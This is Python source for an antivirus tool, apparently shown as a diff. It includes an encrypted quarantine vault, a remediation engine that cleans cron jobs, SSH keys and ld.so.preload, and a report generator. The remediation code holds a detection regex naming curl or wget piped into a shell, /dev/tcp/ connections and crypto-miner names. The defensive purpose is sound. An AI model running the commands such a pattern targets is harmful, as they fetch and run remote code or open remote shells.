result: FileScanResult = self.engine.scan_file(fp)
except Exception:
logger.exception("Error scanning %s", fp)
return
if result.threats:
logger.warning(
"THREAT detected (%s) in %s: %s",
reason,
path,
", ".join(t.threat_name for t in result.threats),
)
# Auto-quarantine if enabled.
if self._vault and fp.exists():
try:
threat = result.threats[0]
qid = self._vault.quarantine_file(fp, {
"threat_name": threat.threat_name,
"threat_type": threat.threat_type.name if hasattr(threat.threat_type, "name") else str(threat.threat_type),
"severity": threat.severity.name if hasattr(threat.severity, "name") else str(threat.severity),
"file_hash": result.file_hash,
})
                    logger.info("Auto-quarantined %s → %s", path, qid)
except Exception:
logger.exception("Auto-quarantine failed for %s", path)
else:
logger.debug("Clean: %s (%s)", path, reason)
# ------------------------------------------------------------------
# Debounce & skip logic
# ------------------------------------------------------------------
def _is_debounced(self, path: str) -> bool:
"""Return ``True`` if *path* was scanned within the debounce window."""
now = time.monotonic()
with self._lock:
last = self._recent.get(path, 0.0)
if now - last < _DEBOUNCE_SECONDS:
return True
self._recent[path] = now
# Prune stale entries periodically.
if len(self._recent) > 5000:
cutoff = now - _DEBOUNCE_SECONDS * 2
self._recent = {
k: v for k, v in self._recent.items() if v > cutoff
}
return False
    @staticmethod
    def _should_skip(path: str) -> bool:
        """Return ``True`` for temporary / lock / editor backup files."""
        name = Path(path).name.lower()
        if any(name.endswith(s) for s in _SKIP_SUFFIXES):
            return True
        # Emacs lock files (".#foo") and LibreOffice lock files
        # (".~lock.doc.odt#") are prefixed, not suffixed.
        if name.startswith((".#", ".~lock.")):
            return True
        return False
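The `_is_debounced` logic above is a plain monotonic-clock window keyed by path. A self-contained sketch of the same mechanism (module-level names here are local stand-ins for the instance state):

```python
import time
from typing import Optional

DEBOUNCE_SECONDS = 2.0
_recent: dict[str, float] = {}  # path → last-accepted event timestamp

def is_debounced(path: str, now: Optional[float] = None) -> bool:
    """True if *path* fired within the window; otherwise record it and pass."""
    now = time.monotonic() if now is None else now
    last = _recent.get(path, 0.0)
    if now - last < DEBOUNCE_SECONDS:
        return True
    _recent[path] = now
    return False
```

Using `time.monotonic()` rather than `time.time()` matters here: wall-clock adjustments (NTP, DST) could otherwise make the window spuriously pass or block events.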

@@ -0,0 +1,378 @@
"""Encrypted quarantine vault for AYN Antivirus.
Isolates malicious files by encrypting them with Fernet (AES-128-CBC +
HMAC-SHA256) and storing them alongside JSON metadata in a dedicated
vault directory. Files can be restored, inspected, or permanently deleted.
"""
from __future__ import annotations
import fcntl
import json
import logging
import os
import re
import shutil
import stat
from datetime import datetime, timedelta
from pathlib import Path
from typing import Any, Dict, List, Optional
from uuid import uuid4
from cryptography.fernet import Fernet
from ayn_antivirus.constants import (
DEFAULT_QUARANTINE_PATH,
QUARANTINE_ENCRYPTION_KEY_FILE,
SCAN_CHUNK_SIZE,
)
from ayn_antivirus.core.event_bus import EventType, event_bus
logger = logging.getLogger(__name__)
class QuarantineVault:
"""Encrypted file quarantine vault.
Parameters
----------
quarantine_dir:
Directory where encrypted files and metadata are stored.
key_file_path:
Path to the Fernet key file. Generated automatically on first use.
"""
_VALID_QID_PATTERN = re.compile(r'^[a-f0-9]{32}$')
# Directories that should never be a restore destination.
_BLOCKED_DIRS = frozenset({
Path("/etc"), Path("/usr/bin"), Path("/usr/sbin"), Path("/sbin"),
Path("/bin"), Path("/boot"), Path("/root/.ssh"), Path("/proc"),
Path("/sys"), Path("/dev"), Path("/var/run"),
})
# Directories used for scheduled tasks — never restore into these.
_CRON_DIRS = frozenset({
Path("/etc/cron.d"), Path("/etc/cron.daily"),
Path("/etc/cron.hourly"), Path("/var/spool/cron"),
Path("/etc/systemd"),
})
def __init__(
self,
quarantine_dir: str | Path = DEFAULT_QUARANTINE_PATH,
key_file_path: str | Path = QUARANTINE_ENCRYPTION_KEY_FILE,
) -> None:
self.vault_dir = Path(quarantine_dir)
self.key_file = Path(key_file_path)
self._fernet: Optional[Fernet] = None
# Ensure directories exist.
self.vault_dir.mkdir(parents=True, exist_ok=True)
self.key_file.parent.mkdir(parents=True, exist_ok=True)
# ------------------------------------------------------------------
# Input validation
# ------------------------------------------------------------------
def _validate_qid(self, quarantine_id: str) -> str:
"""Validate quarantine ID is a hex UUID (no path traversal).
Raises :class:`ValueError` if the ID does not match the expected
32-character hexadecimal format.
"""
qid = quarantine_id.strip()
if not self._VALID_QID_PATTERN.match(qid):
raise ValueError(
f"Invalid quarantine ID format: {quarantine_id!r} "
f"(must be 32 hex chars)"
)
return qid
def _validate_restore_path(self, path_str: str) -> Path:
"""Validate restore path to prevent directory traversal.
Blocks restoring to sensitive system directories and scheduled-
task directories. Resolves all paths to handle symlinks like
``/etc`` → ``/private/etc`` on macOS.
"""
dest = Path(path_str).resolve()
for blocked in self._BLOCKED_DIRS:
resolved = blocked.resolve()
if dest == resolved or resolved in dest.parents or dest.parent == resolved:
raise ValueError(f"Refusing to restore to protected path: {dest}")
for cron_dir in self._CRON_DIRS:
resolved = cron_dir.resolve()
if resolved in dest.parents or dest.parent == resolved:
raise ValueError(
f"Refusing to restore to scheduled task directory: {dest}"
)
return dest
# ------------------------------------------------------------------
# Key management
# ------------------------------------------------------------------
def _get_fernet(self) -> Fernet:
"""Return the cached Fernet instance, loading or generating the key."""
if self._fernet is not None:
return self._fernet
if self.key_file.exists():
key = self.key_file.read_bytes().strip()
else:
key = Fernet.generate_key()
# Write key with restricted permissions.
fd = os.open(
str(self.key_file),
os.O_WRONLY | os.O_CREAT | os.O_TRUNC,
0o600,
)
try:
os.write(fd, key + b"\n")
finally:
os.close(fd)
logger.info("Generated new quarantine encryption key: %s", self.key_file)
self._fernet = Fernet(key)
return self._fernet
# ------------------------------------------------------------------
# Quarantine
# ------------------------------------------------------------------
def quarantine_file(
self,
file_path: str | Path,
threat_info: Dict[str, Any],
) -> str:
"""Encrypt and move a file into the vault.
Parameters
----------
file_path:
Path to the file to quarantine.
threat_info:
Metadata dict (typically from a detector result). Expected keys:
``threat_name``, ``threat_type``, ``severity``, ``file_hash``.
Returns
-------
str
The quarantine ID (UUID) for this entry.
"""
src = Path(file_path).resolve()
if not src.is_file():
raise FileNotFoundError(f"Cannot quarantine: {src} does not exist or is not a file")
qid = uuid4().hex
fernet = self._get_fernet()
# Lock, read, and encrypt (prevents TOCTOU races).
with open(src, "rb") as f:
fcntl.flock(f.fileno(), fcntl.LOCK_EX)
plaintext = f.read()
st = os.fstat(f.fileno())
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
ciphertext = fernet.encrypt(plaintext)
# Gather metadata.
meta = {
"id": qid,
"original_path": str(src),
"original_permissions": oct(st.st_mode & 0o7777),
"threat_name": threat_info.get("threat_name", "Unknown"),
"threat_type": threat_info.get("threat_type", "MALWARE"),
"severity": threat_info.get("severity", "HIGH"),
"quarantine_date": datetime.utcnow().isoformat(),
"file_hash": threat_info.get("file_hash", ""),
"file_size": st.st_size,
}
# Write encrypted file + metadata.
enc_path = self.vault_dir / f"{qid}.enc"
meta_path = self.vault_dir / f"{qid}.json"
enc_path.write_bytes(ciphertext)
meta_path.write_text(json.dumps(meta, indent=2))
# Remove original.
try:
src.unlink()
            logger.info("Quarantined %s → %s (threat: %s)", src, qid, meta["threat_name"])
except OSError as exc:
logger.warning("Encrypted copy saved but failed to remove original %s: %s", src, exc)
event_bus.publish(EventType.QUARANTINE_ACTION, {
"action": "quarantine",
"quarantine_id": qid,
"original_path": str(src),
"threat_name": meta["threat_name"],
})
return qid
# ------------------------------------------------------------------
# Restore
# ------------------------------------------------------------------
def restore_file(
self,
quarantine_id: str,
restore_path: Optional[str | Path] = None,
) -> str:
"""Decrypt and restore a quarantined file.
Parameters
----------
quarantine_id:
UUID returned by :meth:`quarantine_file`.
restore_path:
Where to write the restored file. Defaults to the original path.
Returns
-------
str
Absolute path of the restored file.
Raises
------
ValueError
If the quarantine ID is malformed or the restore path points
to a protected system directory.
"""
qid = self._validate_qid(quarantine_id)
meta = self._load_meta(qid)
enc_path = self.vault_dir / f"{qid}.enc"
if not enc_path.exists():
raise FileNotFoundError(f"Encrypted file not found for quarantine ID {qid}")
# Validate restore destination.
if restore_path:
dest = self._validate_restore_path(str(restore_path))
else:
dest = self._validate_restore_path(str(meta["original_path"]))
fernet = self._get_fernet()
ciphertext = enc_path.read_bytes()
plaintext = fernet.decrypt(ciphertext)
dest.parent.mkdir(parents=True, exist_ok=True)
dest.write_bytes(plaintext)
# Restore original permissions, stripping SUID/SGID/sticky bits.
try:
perms = int(meta.get("original_permissions", "0o644"), 8)
perms = perms & 0o0777 # Keep only rwx bits
dest.chmod(perms)
except (ValueError, OSError):
pass
        logger.info("Restored quarantined file %s → %s", qid, dest)
event_bus.publish(EventType.QUARANTINE_ACTION, {
"action": "restore",
"quarantine_id": qid,
"restored_path": str(dest),
})
return str(dest.resolve())
# ------------------------------------------------------------------
# Delete
# ------------------------------------------------------------------
def delete_file(self, quarantine_id: str) -> bool:
"""Permanently remove a quarantined entry (encrypted file + metadata).
Returns ``True`` if files were deleted.
"""
qid = self._validate_qid(quarantine_id)
enc_path = self.vault_dir / f"{qid}.enc"
meta_path = self.vault_dir / f"{qid}.json"
deleted = False
for p in (enc_path, meta_path):
if p.exists():
p.unlink()
deleted = True
if deleted:
logger.info("Permanently deleted quarantine entry: %s", qid)
event_bus.publish(EventType.QUARANTINE_ACTION, {
"action": "delete",
"quarantine_id": qid,
})
return deleted
# ------------------------------------------------------------------
# Listing / info
# ------------------------------------------------------------------
def list_quarantined(self) -> List[Dict[str, Any]]:
"""Return a summary list of all quarantined items."""
items: List[Dict[str, Any]] = []
for meta_file in sorted(self.vault_dir.glob("*.json")):
try:
meta = json.loads(meta_file.read_text())
items.append({
"id": meta.get("id", meta_file.stem),
"original_path": meta.get("original_path", "?"),
"threat_name": meta.get("threat_name", "?"),
"quarantine_date": meta.get("quarantine_date", "?"),
"size": meta.get("file_size", 0),
})
except (json.JSONDecodeError, OSError):
continue
return items
def get_info(self, quarantine_id: str) -> Dict[str, Any]:
"""Return full metadata for a quarantine entry.
Raises ``FileNotFoundError`` if the ID is unknown.
"""
qid = self._validate_qid(quarantine_id)
return self._load_meta(qid)
def count(self) -> int:
"""Number of items currently in the vault."""
return len(list(self.vault_dir.glob("*.json")))
# ------------------------------------------------------------------
# Maintenance
# ------------------------------------------------------------------
def clean_old(self, days: int = 30) -> int:
"""Delete quarantine entries older than *days*.
Returns the number of entries removed.
"""
cutoff = datetime.utcnow() - timedelta(days=days)
removed = 0
for meta_file in self.vault_dir.glob("*.json"):
try:
meta = json.loads(meta_file.read_text())
qdate = datetime.fromisoformat(meta.get("quarantine_date", ""))
if qdate < cutoff:
qid = meta.get("id", meta_file.stem)
self.delete_file(qid)
removed += 1
except (json.JSONDecodeError, ValueError, OSError):
continue
if removed:
logger.info("Cleaned %d quarantine entries older than %d days", removed, days)
return removed
# ------------------------------------------------------------------
# Internal
# ------------------------------------------------------------------
def _load_meta(self, quarantine_id: str) -> Dict[str, Any]:
qid = self._validate_qid(quarantine_id)
meta_path = self.vault_dir / f"{qid}.json"
if not meta_path.exists():
raise FileNotFoundError(f"Quarantine metadata not found: {qid}")
return json.loads(meta_path.read_text())
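The vault's two input-validation guards — hex-UUID quarantine IDs and resolved-path checks against protected directories — can be sketched with the stdlib alone (the blocked list is abbreviated here for illustration):

```python
import re
from pathlib import Path

_QID = re.compile(r"^[a-f0-9]{32}$")
_BLOCKED = (Path("/etc"), Path("/usr/bin"))  # abbreviated; see _BLOCKED_DIRS above

def safe_qid(qid: str) -> str:
    """Reject anything that is not a 32-char hex ID (blocks path traversal)."""
    qid = qid.strip()
    if not _QID.match(qid):
        raise ValueError(f"bad quarantine id: {qid!r}")
    return qid

def safe_restore(path: str) -> Path:
    """Resolve symlinks first, then refuse protected destinations."""
    dest = Path(path).resolve()
    for blocked in _BLOCKED:
        b = blocked.resolve()
        if dest == b or b in dest.parents:
            raise ValueError(f"protected path: {dest}")
    return dest
```

Resolving both sides before comparing is the key design choice: it defeats `../` traversal in IDs outright (they never match the hex pattern) and catches symlinked aliases of protected directories, such as `/etc` → `/private/etc` on macOS.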

@@ -0,0 +1,544 @@
"""Automated remediation engine for AYN Antivirus.
Provides targeted fix actions for different threat types: permission
hardening, process killing, cron cleanup, SSH key auditing, startup
script removal, LD_PRELOAD cleaning, IP/domain blocking, and system
binary restoration via the system package manager.
All actions support a **dry-run** mode that logs intended changes without
modifying the system.
"""
from __future__ import annotations
import logging
import os
import re
import shutil
import stat
import subprocess
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional
import psutil
from ayn_antivirus.constants import SUSPICIOUS_CRON_PATTERNS
from ayn_antivirus.core.event_bus import EventType, event_bus
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Action record
# ---------------------------------------------------------------------------
@dataclass
class RemediationAction:
"""Describes a single remediation step."""
action: str
target: str
details: str = ""
success: bool = False
dry_run: bool = False
# ---------------------------------------------------------------------------
# AutoPatcher
# ---------------------------------------------------------------------------
class AutoPatcher:
"""Apply targeted remediations against discovered threats.
Parameters
----------
dry_run:
If ``True``, no changes are made — only the intended actions are
logged and returned.
"""
def __init__(self, dry_run: bool = False) -> None:
self.dry_run = dry_run
self.actions: List[RemediationAction] = []
# ------------------------------------------------------------------
# High-level dispatcher
# ------------------------------------------------------------------
def remediate_threat(self, threat_info: Dict[str, Any]) -> List[RemediationAction]:
"""Choose and execute the correct fix(es) for *threat_info*.
Routes on ``threat_type`` (MINER, ROOTKIT, SPYWARE, MALWARE, etc.)
and the available metadata.
"""
ttype = (threat_info.get("threat_type") or "").upper()
path = threat_info.get("path", "")
pid = threat_info.get("pid")
actions: List[RemediationAction] = []
# Kill associated process.
if pid:
actions.append(self.kill_malicious_process(int(pid)))
# Quarantine / permission fix for file-based threats.
if path and Path(path).exists():
actions.append(self.fix_permissions(path))
# Type-specific extras.
if ttype == "ROOTKIT":
actions.append(self.fix_ld_preload())
elif ttype == "MINER":
# Block known pool domains if we have one.
domain = threat_info.get("domain")
if domain:
actions.append(self.block_domain(domain))
ip = threat_info.get("ip")
if ip:
actions.append(self.block_ip(ip))
elif ttype == "SPYWARE":
if path and "cron" in path:
actions.append(self.remove_malicious_cron())
for a in actions:
self._publish(a)
self.actions.extend(actions)
return actions
# ------------------------------------------------------------------
# Permission fixes
# ------------------------------------------------------------------
def fix_permissions(self, path: str | Path) -> RemediationAction:
"""Remove SUID, SGID, and world-writable bits from *path*."""
p = Path(path)
action = RemediationAction(
action="fix_permissions",
target=str(p),
dry_run=self.dry_run,
)
try:
st = p.stat()
old_mode = st.st_mode
new_mode = old_mode
# Strip SUID / SGID.
new_mode &= ~stat.S_ISUID
new_mode &= ~stat.S_ISGID
# Strip world-writable.
new_mode &= ~stat.S_IWOTH
if new_mode == old_mode:
action.details = "Permissions already safe"
action.success = True
return action
action.details = (
f"Changing permissions: {oct(old_mode & 0o7777)}{oct(new_mode & 0o7777)}"
)
if not self.dry_run:
p.chmod(new_mode)
action.success = True
logger.info("fix_permissions: %s %s", action.details, "(dry-run)" if self.dry_run else "")
except OSError as exc:
action.details = f"Failed: {exc}"
logger.error("fix_permissions failed on %s: %s", p, exc)
return action
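The hardening in `fix_permissions` reduces to three bit-clears on the file mode. The same arithmetic in isolation (the helper name is ours, for illustration):

```python
import stat

def harden_mode(mode: int) -> int:
    """Clear SUID, SGID, and world-writable bits, as fix_permissions does."""
    mode &= ~stat.S_ISUID  # drop set-user-id (0o4000)
    mode &= ~stat.S_ISGID  # drop set-group-id (0o2000)
    mode &= ~stat.S_IWOTH  # drop world-writable (0o0002)
    return mode

# A SUID, world-writable binary (mode 4777) ends up as plain 0775.
assert harden_mode(0o4777) == 0o775
```

Other permission bits (owner/group read-write-execute) pass through untouched, which is why an already-safe mode short-circuits with "Permissions already safe".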
# ------------------------------------------------------------------
# Process killing
# ------------------------------------------------------------------
def kill_malicious_process(self, pid: int) -> RemediationAction:
"""Send SIGKILL to *pid*."""
action = RemediationAction(
action="kill_process",
target=str(pid),
dry_run=self.dry_run,
)
try:
proc = psutil.Process(pid)
proc_name = proc.name()  # capture now; psutil re-queries the kernel on each name() call
action.details = f"Process: {proc_name} (PID {pid})"
except psutil.NoSuchProcess:
action.details = f"PID {pid} no longer exists"
action.success = True
return action
if self.dry_run:
action.success = True
return action
try:
proc.kill()
proc.wait(timeout=5)
action.success = True
logger.info("Killed process %d (%s)", pid, proc_name)
except psutil.NoSuchProcess:
action.success = True
action.details += " (already exited)"
except (psutil.AccessDenied, psutil.TimeoutExpired) as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to kill PID %d: %s", pid, exc)
return action
# ------------------------------------------------------------------
# Cron cleanup
# ------------------------------------------------------------------
def remove_malicious_cron(self, pattern: Optional[str] = None) -> RemediationAction:
"""Remove cron entries matching suspicious patterns.
If *pattern* is ``None``, uses all :pydata:`SUSPICIOUS_CRON_PATTERNS`.
"""
action = RemediationAction(
action="remove_malicious_cron",
target="/var/spool/cron + /etc/cron.d",
dry_run=self.dry_run,
)
patterns = [re.compile(pattern)] if pattern else [
re.compile(p) for p in SUSPICIOUS_CRON_PATTERNS
]
removed_lines: List[str] = []
cron_dirs = [
Path("/var/spool/cron/crontabs"),
Path("/var/spool/cron"),
Path("/etc/cron.d"),
]
for cron_dir in cron_dirs:
if not cron_dir.is_dir():
continue
for cron_file in cron_dir.iterdir():
if not cron_file.is_file():
continue
try:
lines = cron_file.read_text().splitlines()
clean_lines = []
for line in lines:
if any(pat.search(line) for pat in patterns):
removed_lines.append(f"{cron_file}: {line.strip()}")
else:
clean_lines.append(line)
if len(clean_lines) < len(lines) and not self.dry_run:
cron_file.write_text("\n".join(clean_lines) + "\n")
except OSError:
continue
action.details = f"Removed {len(removed_lines)} cron line(s)"
if removed_lines:
action.details += ": " + "; ".join(removed_lines[:5])
action.success = True
logger.info("remove_malicious_cron: %s", action.details)
return action
# ------------------------------------------------------------------
# SSH key cleanup
# ------------------------------------------------------------------
def clean_authorized_keys(self, path: Optional[str | Path] = None) -> RemediationAction:
"""Remove unauthorized keys from ``authorized_keys``.
Without *path*, scans all users' ``~/.ssh/authorized_keys`` plus
``/root/.ssh/authorized_keys``.
In non-dry-run mode, backs up the file before modifying.
"""
action = RemediationAction(
action="clean_authorized_keys",
target=str(path) if path else "all users",
dry_run=self.dry_run,
)
targets: List[Path] = []
if path:
targets.append(Path(path))
else:
# Root
root_ak = Path("/root/.ssh/authorized_keys")
if root_ak.exists():
targets.append(root_ak)
# System users from /home
home = Path("/home")
if home.is_dir():
for user_dir in home.iterdir():
ak = user_dir / ".ssh" / "authorized_keys"
if ak.exists():
targets.append(ak)
total_removed = 0
for ak_path in targets:
try:
lines = ak_path.read_text().splitlines()
clean: List[str] = []
for line in lines:
stripped = line.strip()
if not stripped or stripped.startswith("#"):
clean.append(line)
continue
# Flag lines with forced commands as suspicious.
if stripped.startswith("command="):
total_removed += 1
continue
clean.append(line)
if len(clean) < len(lines) and not self.dry_run:
backup = ak_path.with_suffix(".bak")
shutil.copy2(str(ak_path), str(backup))
ak_path.write_text("\n".join(clean) + "\n")
except OSError:
continue
action.details = f"Removed {total_removed} suspicious key(s) from {len(targets)} file(s)"
action.success = True
logger.info("clean_authorized_keys: %s", action.details)
return action
# ------------------------------------------------------------------
# Startup script cleanup
# ------------------------------------------------------------------
def remove_suspicious_startup(self, path: Optional[str | Path] = None) -> RemediationAction:
"""Remove suspicious entries from init scripts, systemd units, or rc.local."""
action = RemediationAction(
action="remove_suspicious_startup",
target=str(path) if path else "/etc/init.d, systemd, rc.local",
dry_run=self.dry_run,
)
suspicious_re = re.compile(
r"(?:curl|wget)\s+.*\|\s*(?:sh|bash)|xmrig|minerd|/dev/tcp/|nohup\s+.*&",
re.IGNORECASE,
)
targets: List[Path] = []
if path:
targets.append(Path(path))
else:
rc_local = Path("/etc/rc.local")
if rc_local.exists():
targets.append(rc_local)
for d in ("/etc/init.d", "/etc/systemd/system"):
dp = Path(d)
if dp.is_dir():
targets.extend(f for f in dp.iterdir() if f.is_file())
cleaned_count = 0
for target in targets:
try:
content = target.read_text()
lines = content.splitlines()
clean = [l for l in lines if not suspicious_re.search(l)]
if len(clean) < len(lines):
cleaned_count += len(lines) - len(clean)
if not self.dry_run:
backup = target.with_suffix(target.suffix + ".bak")
shutil.copy2(str(target), str(backup))
target.write_text("\n".join(clean) + "\n")
except OSError:
continue
action.details = f"Removed {cleaned_count} suspicious line(s) from {len(targets)} file(s)"
action.success = True
logger.info("remove_suspicious_startup: %s", action.details)
return action
# ------------------------------------------------------------------
# LD_PRELOAD cleanup
# ------------------------------------------------------------------
def fix_ld_preload(self) -> RemediationAction:
"""Remove all entries from ``/etc/ld.so.preload``."""
action = RemediationAction(
action="fix_ld_preload",
target="/etc/ld.so.preload",
dry_run=self.dry_run,
)
ld_path = Path("/etc/ld.so.preload")
if not ld_path.exists():
action.details = "File does not exist — nothing to fix"
action.success = True
return action
try:
content = ld_path.read_text().strip()
if not content:
action.details = "File is already empty"
action.success = True
return action
action.details = f"Clearing ld.so.preload (was: {content[:120]})"
if not self.dry_run:
backup = ld_path.with_suffix(ld_path.suffix + ".bak")  # -> /etc/ld.so.preload.bak (plain .with_suffix(".bak") would replace ".preload")
shutil.copy2(str(ld_path), str(backup))
ld_path.write_text("")
action.success = True
logger.info("fix_ld_preload: %s", action.details)
except OSError as exc:
action.details = f"Failed: {exc}"
logger.error("fix_ld_preload: %s", exc)
return action
# ------------------------------------------------------------------
# Network blocking
# ------------------------------------------------------------------
def block_ip(self, ip_address: str) -> RemediationAction:
"""Add an iptables DROP rule for *ip_address*."""
action = RemediationAction(
action="block_ip",
target=ip_address,
dry_run=self.dry_run,
)
cmd = ["iptables", "-A", "OUTPUT", "-d", ip_address, "-j", "DROP"]
action.details = f"Rule: {' '.join(cmd)}"
if self.dry_run:
action.success = True
return action
try:
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE, timeout=10)
action.success = True
logger.info("Blocked IP via iptables: %s", ip_address)
except (subprocess.CalledProcessError, FileNotFoundError, OSError) as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to block IP %s: %s", ip_address, exc)
return action
def block_domain(self, domain: str) -> RemediationAction:
"""Redirect *domain* to 127.0.0.1 via ``/etc/hosts``."""
action = RemediationAction(
action="block_domain",
target=domain,
dry_run=self.dry_run,
)
hosts_path = Path("/etc/hosts")
entry = f"127.0.0.1 {domain} # blocked by ayn-antivirus"
action.details = f"Adding to /etc/hosts: {entry}"
if self.dry_run:
action.success = True
return action
try:
current = hosts_path.read_text()
if domain in current:
action.details = f"Domain {domain} already in /etc/hosts"
action.success = True
return action
with open(hosts_path, "a") as fh:
fh.write(f"\n{entry}\n")
action.success = True
logger.info("Blocked domain via /etc/hosts: %s", domain)
except OSError as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to block domain %s: %s", domain, exc)
return action
# ------------------------------------------------------------------
# System binary restoration
# ------------------------------------------------------------------
def restore_system_binary(self, binary_path: str | Path) -> RemediationAction:
"""Reinstall the package owning *binary_path* using the system package manager."""
binary_path = Path(binary_path)
action = RemediationAction(
action="restore_system_binary",
target=str(binary_path),
dry_run=self.dry_run,
)
# Determine package manager and owning package.
pkg_name, pm_cmd = _find_owning_package(binary_path)
if not pkg_name:
action.details = f"Cannot determine owning package for {binary_path}"
return action
reinstall_cmd = pm_cmd + [pkg_name]
action.details = f"Reinstalling package '{pkg_name}': {' '.join(reinstall_cmd)}"
if self.dry_run:
action.success = True
return action
try:
subprocess.check_call(
reinstall_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE, timeout=120
)
action.success = True
logger.info("Restored %s via %s", binary_path, " ".join(reinstall_cmd))
except (subprocess.CalledProcessError, FileNotFoundError, OSError) as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to restore %s: %s", binary_path, exc)
return action
# ------------------------------------------------------------------
# Internal helpers
# ------------------------------------------------------------------
def _publish(self, action: RemediationAction) -> None:
event_bus.publish(EventType.REMEDIATION_ACTION, {
"action": action.action,
"target": action.target,
"details": action.details,
"success": action.success,
"dry_run": action.dry_run,
})
# ---------------------------------------------------------------------------
# Package-manager helpers
# ---------------------------------------------------------------------------
def _find_owning_package(binary_path: Path) -> tuple[str, List[str]]:
"""Return ``(package_name, reinstall_command_prefix)`` or ``("", [])``."""
path_str = str(binary_path)
# dpkg (Debian/Ubuntu)
try:
out = subprocess.check_output(
["dpkg", "-S", path_str], stderr=subprocess.DEVNULL, timeout=10
).decode().strip()
pkg = out.split(":")[0]
return pkg, ["apt-get", "install", "--reinstall", "-y"]
except (subprocess.CalledProcessError, FileNotFoundError, OSError):
pass
# rpm (RHEL/CentOS/Fedora)
try:
out = subprocess.check_output(
["rpm", "-qf", path_str], stderr=subprocess.DEVNULL, timeout=10
).decode().strip()
if "not owned" not in out:
# Try dnf first, fall back to yum.
pm = "dnf" if shutil.which("dnf") else "yum"
return out, [pm, "reinstall", "-y"]
except (subprocess.CalledProcessError, FileNotFoundError, OSError):
pass
return "", []
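The dpkg branch relies on `dpkg -S` printing `package: /path`, so the package name is everything before the first colon. That parse step in isolation (the helper name is ours; the sample strings follow dpkg's documented output format):

```python
def parse_dpkg_owner(dpkg_s_output: str) -> str:
    """Extract the owning package from `dpkg -S` output, as _find_owning_package does."""
    return dpkg_s_output.strip().split(":")[0]

# Typical `dpkg -S /bin/ls` output on Debian/Ubuntu.
assert parse_dpkg_owner("coreutils: /bin/ls") == "coreutils"
```

Splitting on the first colon also handles multi-arch output such as `coreutils:amd64: /bin/ls`, which still yields `coreutils`.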


@@ -0,0 +1,535 @@
"""Report generator for AYN Antivirus.
Produces scan reports in plain-text, JSON, and HTML formats from
:class:`ScanResult` / :class:`FullScanResult` dataclasses.
"""
from __future__ import annotations
import html as html_mod
import json
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional, Union
from ayn_antivirus import __version__
from ayn_antivirus.core.engine import (
FullScanResult,
ScanResult,
ThreatInfo,
)
from ayn_antivirus.utils.helpers import format_duration, format_size, get_system_info
# Type alias for either result kind.
AnyResult = Union[ScanResult, FullScanResult]
class ReportGenerator:
"""Create scan reports in multiple output formats."""
# ------------------------------------------------------------------
# Plain text
# ------------------------------------------------------------------
@staticmethod
def generate_text(result: AnyResult) -> str:
"""Render a human-readable plain-text report."""
threats, meta = _extract(result)
lines: List[str] = []
lines.append("=" * 72)
lines.append(" AYN ANTIVIRUS — SCAN REPORT")
lines.append("=" * 72)
lines.append("")
lines.append(f" Generated : {datetime.utcnow().isoformat()}")
lines.append(f" Version : {__version__}")
lines.append(f" Scan ID : {meta.get('scan_id', 'N/A')}")
lines.append(f" Scan Type : {meta.get('scan_type', 'N/A')}")
lines.append(f" Duration : {format_duration(meta.get('duration', 0))}")
lines.append("")
# Summary.
sev_counts = _severity_counts(threats)
lines.append("-" * 72)
lines.append(" SUMMARY")
lines.append("-" * 72)
lines.append(f" Files scanned : {meta.get('files_scanned', 0)}")
lines.append(f" Files skipped : {meta.get('files_skipped', 0)}")
lines.append(f" Threats found : {len(threats)}")
lines.append(f" CRITICAL : {sev_counts.get('CRITICAL', 0)}")
lines.append(f" HIGH : {sev_counts.get('HIGH', 0)}")
lines.append(f" MEDIUM : {sev_counts.get('MEDIUM', 0)}")
lines.append(f" LOW : {sev_counts.get('LOW', 0)}")
lines.append("")
# Threat table.
if threats:
lines.append("-" * 72)
lines.append(" THREATS")
lines.append("-" * 72)
hdr = f" {'#':>3} {'Severity':<10} {'Threat Name':<30} {'File'}"
lines.append(hdr)
lines.append(" " + "-" * 68)
for idx, t in enumerate(threats, 1):
sev = _sev_str(t)
name = t.threat_name[:30]
fpath = t.path[:60]
lines.append(f" {idx:>3} {sev:<10} {name:<30} {fpath}")
lines.append("")
# System info.
try:
info = get_system_info()
lines.append("-" * 72)
lines.append(" SYSTEM INFORMATION")
lines.append("-" * 72)
lines.append(f" Hostname : {info['hostname']}")
lines.append(f" OS : {info['os_pretty']}")
lines.append(f" CPUs : {info['cpu_count']}")
lines.append(f" Memory : {info['memory_total_human']}")
lines.append(f" Uptime : {info['uptime_human']}")
lines.append("")
except Exception:
pass
lines.append("=" * 72)
lines.append(f" Report generated by AYN Antivirus v{__version__}")
lines.append("=" * 72)
return "\n".join(lines) + "\n"
# ------------------------------------------------------------------
# JSON
# ------------------------------------------------------------------
@staticmethod
def generate_json(result: AnyResult) -> str:
"""Render a machine-readable JSON report."""
threats, meta = _extract(result)
sev_counts = _severity_counts(threats)
try:
sys_info = get_system_info()
except Exception:
sys_info = {}
report: Dict[str, Any] = {
"generator": f"ayn-antivirus v{__version__}",
"generated_at": datetime.utcnow().isoformat(),
"scan": {
"scan_id": meta.get("scan_id"),
"scan_type": meta.get("scan_type"),
"start_time": meta.get("start_time"),
"end_time": meta.get("end_time"),
"duration_seconds": meta.get("duration"),
"files_scanned": meta.get("files_scanned", 0),
"files_skipped": meta.get("files_skipped", 0),
},
"summary": {
"total_threats": len(threats),
"by_severity": sev_counts,
},
"threats": [
{
"path": t.path,
"threat_name": t.threat_name,
"threat_type": t.threat_type.name if hasattr(t.threat_type, "name") else str(t.threat_type),
"severity": _sev_str(t),
"detector": t.detector_name,
"details": t.details,
"file_hash": t.file_hash,
"timestamp": t.timestamp.isoformat() if hasattr(t.timestamp, "isoformat") else str(t.timestamp),
}
for t in threats
],
"system": sys_info,
}
return json.dumps(report, indent=2, default=str)
# ------------------------------------------------------------------
# HTML
# ------------------------------------------------------------------
@staticmethod
def generate_html(result: AnyResult) -> str:
"""Render a professional HTML report with dark-theme CSS."""
threats, meta = _extract(result)
sev_counts = _severity_counts(threats)
now = datetime.utcnow()
esc = html_mod.escape
try:
